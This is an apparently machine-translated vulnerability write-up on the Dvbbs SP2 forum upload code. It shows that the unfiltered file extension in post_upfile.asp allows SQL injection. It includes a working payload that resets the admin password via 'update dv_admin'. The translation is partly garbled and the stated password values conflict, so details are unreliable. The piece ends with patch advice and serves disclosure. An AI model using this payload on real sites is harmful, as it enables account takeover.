Reproduction of the dvsp2 upload vulnerability-cracking down the myth of sp2

Some time ago I heard that an unrecoverable error occurs again during the online upload. Some people say it is upload. inc is wrong. I carefully read the code N times. You can say for sure, upload. inc should have no way to use it. Today, I accidentally went to the official website of the mobile network and carefully looked at it. The personal data was modified but not uploaded in the post, upload. asp and post_upload.asp also use upload. inc, prove that this file is absolutely no problem, it must be on post_upfile.asp, open this file and read it again!
First glance
If upload_ViewType <> 999 and F_Type = 1 then
Dvbbs.exe cute ("insert into dv_upFile (F_BoardID, F_UserID, F_Username, F_Filename, F_Viewname, F_FileType, F_Type, F_FileSize, F_Flag) values (" & Dvbbs. boardID & "," & Dvbbs. userID & ", '" & Dvbbs. membername & "','" & replace (rename, "|", "") & "','" & F_Viewname & "','" & replace (FileExt ,". "," ") &" ', "& F_Type &", "& Filesize &", 4 )")
Else
Dvbbs.exe cute ("insert into dv_upFile (F_BoardID, F_UserID, F_Username, F_Filename, F_FileType, F_Type, F_FileSize, F_Flag) values (" & Dvbbs. boardID & "," & Dvbbs. userID & ", '" & Dvbbs. membername & "','" & replace (rename, "|", "") & "','" & replace (FileExt ,". "," ") &" ', "& F_Type &", "& Filesize &", 4 )")
If there is an SQL statement, is it true that the so-called re-exploitation of upload is injection rather than upload? Then we can read all the variables submitted by the user.
Dvbbs. boardID, Dvbbs. userID, Dvbbs. membername, F_Viewname, F_Type, and Filesize are certainly correct. Let's take a look at the other variables. How can we get them!
The first replace (rename, "|", "") removes the "|" symbol in rename. Let's see how the rename variable comes from, rename = createPath & Filename & "|"
It is connected by createpath and filename, and "|" is generated. "|" the symbol is filtered out later. You do not need to filter it. Then you can check the creatpath and filename respectively.
File_name = createName ()
Filename = File_name & "." & FileExt is combined by file_name and fileExt)
Private Function createName ()
Dim ranNum
Randomize
RanNum = int (999 * rnd)
CreateName = year (now) & month (now) & day (now) & hour (now) & minute (now) & second (now) & ranNum
End Function
Obviously, file_name is generated by adding a random number on the year, month, and day. There is no way to use it. The problem lies in fileExt .....
Don't you worry about it? Let's look at other places first.
Creatpath is like this.
Private Function createPath ()
Dim objFSO, Fsofolder, uploadpath
Uploadpath = year (now) & "-" & month (now) 'creates an upload folder by year and month. Format: 2003-8
On Error Resume Next
Set objFSO = Server. createObject ("Scripting. FileSystemObject ")
If objFSO. FolderExists (Server. MapPath (CheckFolder & uploadpath) = False Then
ObjFSO. createFolder Server. MapPath (CheckFolder & uploadpath)
End If
If Err. Number = 0 Then
CreatePath = uploadpath &"/"
Else
CreatePath = ""
End If
Set objFSO = Nothing
End Function
Creatpath is generated by uploadpath and fso by year, such as uploadfile/2004-11.
Okay. Here is a question.
Let's look at another variable replace (FileExt, ".", ""), which is the suspicious fileExt mentioned above. We can find out all his ins and outs to see if they can be used.
Set File = upload. File (FormName) ''to generate a File object
FileExt = FixName (File. FileExt)
Here, he started to appear.
File. isn't fileExt the extension we submitted? Anyone who has uploaded files through the mobile network knows that it is quite normal to grab a package and change the extension. It seems that there is a door, at least we can use it here, ====, FileExt = FixName (File. fileExt) He used fixname for filtering. Let's see what this function is.
Function FixName (UpFileExt)
If IsEmpty (UpFileExt) Then Exit Function
FixName = Lcase (UpFileExt)
FixName = Replace (FixName, Chr (0 ),"")
FixName = Replace (FixName, ".", "") Haha, Replace. With null. Why can't I use OSS sp2 for upload?
FixName = Replace (FixName, "asp", "") to Replace asp with null
FixName = Replace (FixName, "asa", "") asa Filter
FixName = Replace (FixName, "aspx", "") aspx Filter
FixName = Replace (FixName, "cer", "") cer Filter
FixName = Replace (FixName, "cdx", "") cdx Filter
FixName = Replace (FixName, "htr", "") htr Filtering
End Function
Haha, all of them are just some special places to filter, but if we inject the quotation marks, semicolons, commas, and --, none of them are filtered, that is, they are unobstructed, the next step is to use the constructor statement. Let's look at its SQL statement.
Insert into dv_upFile (F_BoardID, F_UserID, F_Username, F_Filename, F_Viewname, F_FileType, F_Type, F_FileSize, F_Flag) values ("& Dvbbs. boardID & "," & Dvbbs. userID & ", '" & Dvbbs. membername & "','" & replace (rename, "|", "") & "','" & F_Viewname & "','" & replace (FileExt ,". "," ") &" ', "& F_Type &", "& Filesize &", 4)
After values
"& Dvbbs. BoardID &", "& Dvbbs. UserID &", '"& Dvbbs. membername &"
All of these are normal. After we change fleExt, rename also changes, so the & replace (FileExt ,". "," ") & here we can ignore it, as long as we construct the previous rename, and then look at how reanme came from
Rename = createPath & Filename & "|"
File_name = createName ()
Filename = File_name & "." & FileExt
Createpath is a normal string of values, which can be excluded. file_name is also a normal value, which has one in the middle. it is negligible. The "|" behind it helps us filter it out. assume that the statement is
Insert into dv_upFile (F_BoardID, F_UserID, F_Username, F_Filename, F_Viewname, F_FileType, F_Type, F_FileSize, F_Flag) values ("1", "1", '"user "', 'uploadfile/2004-11/2324128374912. jpg ', 'user', 'jpg', "1", "1000", 4)
This is a normal statement. We can use jpg, which can be transferred in the package and the local file extension, then we construct jpg into a specific complete SQL statement.
For example, replace jpg
Jpg ', 'user', 'jpg', "1", "1000", 4); update dv_admin set userpasswrod = '000000' where username = 'admin' -- jpg
(In other words, his f_type is used to detect the file type. If it is 1, that is, the previous SQL statement executed in the image. If it is other, the last statement is executed, the specific code is here
F_Type = CheckFiletype (FileExt)
The code of the checkfiletype function is similar.
Private Function CheckFiletype (FileExt)
Dim upFiletype
Dim FilePic, FileVedio, FileSoft, FileFlash, FileMusic
FileExt = Lcase (Replace (FileExt ,".",""))
Select Case Lcase (FileExt)
Case "gif", "jpg", "jpeg", "png", "bmp", "tif", "iff"
CheckFiletype = 1
Case "swf", "swi"
CheckFiletype = 2
Case "mid", "wav", "mp3", "rmi", "cda"
CheckFiletype = 3
Case "avi", "mpg", "mpeg", "ra", "ram", "wov", "asf"
CheckFiletype = 4
Case Else
CheckFiletype = 0
End select
End Function
The fileExt variable is also used here, that is, our extension.
Remove all "." And then remove the extension. Therefore, we need to filter the statement at the end, because the first statement and the second statement have different constructor methods !)
The userpassword of admin in dv_admin is changed to 123.
If it is an access version, it seems a little difficult. The semicolon cannot be executed in multiple languages, and it is not a where condition. It cannot be used to guess, and the value of values does not seem to be able to use select to fill in other values, only by bringing the entire select value back as a record can we add it separately in values. Is there a way to construct this perfect syntax? Even if the SQL level is not very high, the access version has not yet come up with a complete solution.
At the end of the article, the most important thing to say is that all the parameters put into the SQL statement must be strictly checked. The patch in this place is filtered in the fixname () function, if not, turn off the post upload function and wait for the patch! :)